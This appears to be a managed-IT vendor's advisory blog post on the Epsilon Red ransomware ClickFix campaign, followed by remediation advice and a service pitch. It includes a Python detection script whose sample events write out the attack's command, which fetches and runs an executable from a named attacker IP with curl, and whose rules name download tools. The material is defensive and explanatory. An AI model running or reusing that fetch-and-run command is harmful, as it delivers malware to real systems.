
Cybercriminals Weaponize HTA Files Through ClickFix Deception to Deploy Epsilon Red Ransomware
ClickFix HTA Attack Bypasses Security to Deploy Epsilon Red Ransomware – Fake Verification Pages Hide Dangerous Ransomware Attack
A sophisticated new ransomware campaign has emerged that tricks users into executing malicious .HTA files through fake verification pages. The Epsilon Red ransomware operation, active since July 2025, uses a social engineering technique called “ClickFix” to bypass traditional security measures and infect systems worldwide.
What is the ClickFix HTA Attack?
ClickFix represents a dangerous evolution in social engineering tactics that exploits users’ trust in familiar online verification processes. Instead of the typical approach where malicious commands are copied to a victim’s clipboard, this new variant directs users to a secondary webpage where hidden JavaScript code automatically executes through legacy ActiveX controls.
The attack begins when users visit what appears to be a legitimate verification page, often mimicking popular services like Discord, Twitch, or streaming platforms. These fake pages present familiar “I’m not a robot” verification prompts that users encounter regularly across the internet. However, clicking these verification buttons triggers a sophisticated attack chain that ultimately downloads and executes Epsilon Red ransomware.
Severity of the Threat
This attack represents a HIGH severity threat to organizations and individuals worldwide. The campaign poses significant risks because it:
- Bypasses traditional download protections and security warnings
- Exploits legacy Windows technologies that remain enabled on many systems
- Uses trusted verification interfaces that users interact with daily
- Delivers ransomware that encrypts files and demands payment for recovery
- Spreads globally across multiple industries and platforms
The attack’s effectiveness lies in its abuse of legitimate Windows components, making detection challenging for standard security tools.
How the Attack Works
The Epsilon Red ClickFix campaign follows a carefully orchestrated attack sequence:
Initial Lure: Attackers create fake verification pages that impersonate popular platforms and services. These pages are distributed through compromised websites, phishing emails, malvertising, and SEO poisoning techniques.
Social Engineering: Users encounter what appears to be a standard verification screen with prompts like “Verify you are human by completing the action below” along with familiar verification buttons.
Malicious Redirection: Instead of copying commands to the clipboard like traditional ClickFix attacks, this variant redirects users to a secondary page on the same malicious domain.
ActiveX Exploitation: The secondary page contains embedded JavaScript that creates an ActiveXObject("WScript.Shell") to execute shell commands directly through the browser without user awareness.
Silent Payload Delivery: The malicious script runs commands that navigate to the user’s profile directory, download the ransomware executable using curl, and execute it silently in the background.
The specific command sequence involves:
- Changing to the user’s home directory
- Downloading a file named “a.exe” from attacker-controlled infrastructure (155.94.155.227:2269)
- Executing the ransomware payload without displaying any visible windows
- Displaying a fake verification message to maintain the deception
(Extra Verification – Source: CloudSEK)
Who is Behind This Campaign?
The Epsilon Red ransomware campaign appears to be operated by cybercriminals who have developed sophisticated infrastructure for long-term operations. Researchers have identified several characteristics of the threat actors:
Operational Infrastructure: The attackers maintain persistent infrastructure that includes multiple themed delivery pages, romance-based lures, and impersonation of popular services, indicating well-planned and resourced operations.
Target Expansion: The campaign targets users globally across various platforms and services, suggesting the attackers are focused on maximizing infection rates rather than targeting specific organizations.
Technical Sophistication: The attackers demonstrate advanced understanding of both social engineering and technical exploitation techniques, combining familiar user interfaces with complex browser-based attack vectors.
Epsilon Red ransomware was first identified in 2021 and shares some stylistic similarities with REvil ransomware in its ransom notes, though it appears to be a distinct operation with unique tactics and infrastructure.
(Extra Steps – Source: CloudSEK)
Who is at Risk?
This attack poses threats to a broad range of potential victims:
Individual Users: Anyone who frequents popular online platforms like Discord, Twitch, streaming services, or dating sites may encounter these fake verification pages.
Small and Medium Businesses: Organizations without robust endpoint protection and user security training face significant risks, especially those that allow personal browsing or have legacy systems with ActiveX enabled.
Healthcare Organizations: The healthcare sector has been specifically targeted by ClickFix attacks, with cybercriminals injecting malicious code into medical websites and services.
Automotive Industry: Over 100 automotive industry websites have been compromised through third-party service providers to distribute ClickFix attacks.
Any Organization Using Legacy Systems: Companies that maintain older Windows systems with ActiveX and Windows Script Host enabled are particularly vulnerable to these attacks.
The attack is especially dangerous because it targets human behavior rather than technical vulnerabilities, making it effective against users regardless of their technical expertise.
(Verification Code – Source: CloudSEK)
Remediation and Protection Strategies
Organizations can implement multiple layers of defense against ClickFix HTA attacks:
Disable Legacy Technologies: Immediately disable ActiveX controls and Windows Script Host (WSH) through Group Policy across all systems. These legacy technologies provide attack vectors that modern organizations rarely need.
Browser Security Hardening: Implement modern browser security policies that block execution of legacy scripting interfaces and enforce strict content security policies.
Network-Level Blocking: Deploy threat intelligence feeds to automatically block known attacker IP addresses and domains associated with ClickFix campaigns. Specifically block access to 155.94.155.227 and related infrastructure.
Endpoint Detection and Response: Configure EDR solutions to monitor for:
- MSHTA.exe execution from browser processes
- Hidden command executions using shell.Run with parameter "0"
- Silent downloads via curl or other download utilities
- Suspicious child process creation from web browsers
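As a defender-side illustration of the EDR monitoring points above and of the process chain described under "How the Attack Works", here is an added Python example (not code from the article or from CloudSEK) that classifies constructed Sysmon-style process-creation events, using the field names Image, ParentImage and CommandLine, against rules for mshta.exe launched by a browser or running an .hta from a download path, a shell spawned under a browser or script host, a download utility fetching an executable, and the delivery host named in the article. The hidden-window parameter passed to shell.Run is not visible in process telemetry, so the rules key on the resulting process tree and command lines instead; the process-name sets and the .hta-from-Downloads heuristic are assumptions that go slightly beyond the article's list.

```python
import re

# Process names a ClickFix HTA chain passes through: the browser showing the fake
# verification page, mshta.exe hosting the HTA, and the shell that WScript.Shell
# runs hidden (window style 0) to fetch and start the payload.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADER_RE = re.compile(r"\b(curl|certutil|bitsadmin|wget)\b", re.I)
EXE_FETCH_RE = re.compile(r"(-o\s+\S+\.exe|https?://\S+\.exe)", re.I)
HTA_FROM_DOWNLOAD_RE = re.compile(r"\\(downloads|temp|inetcache)\\[^\s\"]*\.hta", re.I)
KNOWN_BAD_HOSTS = ("155.94.155.227",)  # delivery host named in the article

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the rule names that match one Sysmon-style process-creation event
    (fields Image, ParentImage, CommandLine)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and parent in BROWSERS:
        hits.append("mshta_spawned_by_browser")
    if image == "mshta.exe" and HTA_FROM_DOWNLOAD_RE.search(cmd):
        hits.append("mshta_running_hta_from_download_path")
    if image in SHELLS and parent in BROWSERS | SCRIPT_HOSTS:
        hits.append("shell_spawned_by_browser_or_script_host")
    if DOWNLOADER_RE.search(cmd) and EXE_FETCH_RE.search(cmd):
        hits.append("executable_fetched_by_download_utility")
    if any(host in cmd for host in KNOWN_BAD_HOSTS):
        hits.append("known_clickfix_infrastructure")
    return hits

def scan(events):
    """Return (process name, rule names) for each event that triggers a rule."""
    return [(basename(e["Image"]), classify(e)) for e in events if classify(e)]

# Constructed sample telemetry modelled on the chain the article describes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'mshta.exe "C:\Users\alice\Downloads\verify.hta"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd /c cd %userprofile% && curl -o a.exe http://155.94.155.227:2269/a.exe && a.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",   # benign: shell opened from Explorer
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd /c dir"},
]
```

Feeding real Sysmon Event ID 1 records through scan() gives one finding per suspicious process, with the benign Explorer-launched shell producing no hit.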
User Security Training: Conduct regular phishing simulations that specifically include ClickFix-style attacks. Train users to recognize fake verification pages and understand that legitimate verification never requires running commands or downloading files.
Email Security Controls: Implement advanced email filtering to block phishing messages that direct users to ClickFix pages, including anti-phishing filters and domain verification technologies like DMARC, DKIM, and SPF.
How CinchOps Can Help Secure Your Business
CinchOps provides comprehensive cybersecurity solutions designed to protect your business from sophisticated threats like the ClickFix HTA ransomware campaign. Our experienced team understands the evolving threat environment and can implement multiple layers of defense to keep your organization secure.
Our managed IT support services include:
- Advanced Endpoint Protection: Deploy and manage next-generation antivirus and EDR solutions that detect browser-based attacks and suspicious script execution
- Network Security Monitoring: Continuous monitoring of network traffic to identify and block malicious communications and payload downloads
- Security Policy Implementation: Configure Group Policies and browser security settings to disable dangerous legacy technologies like ActiveX and WSH
- User Security Training: Regular cybersecurity awareness training that includes current attack techniques like ClickFix and social engineering tactics
- Incident Response Planning: Develop and test incident response procedures specifically for ransomware attacks, including backup verification and recovery processes
- Vulnerability Management: Regular security assessments to identify and remediate potential attack vectors before cybercriminals can exploit them
- Threat Intelligence Integration: Real-time threat feeds and security updates to protect against the latest attack campaigns and malicious infrastructure
CinchOps combines decades of IT security experience with cutting-edge technology to provide the comprehensive protection your business needs against modern cyber threats.
For Additional Information on this topic: Ransomware spread using HTA files in new ClickFix campaign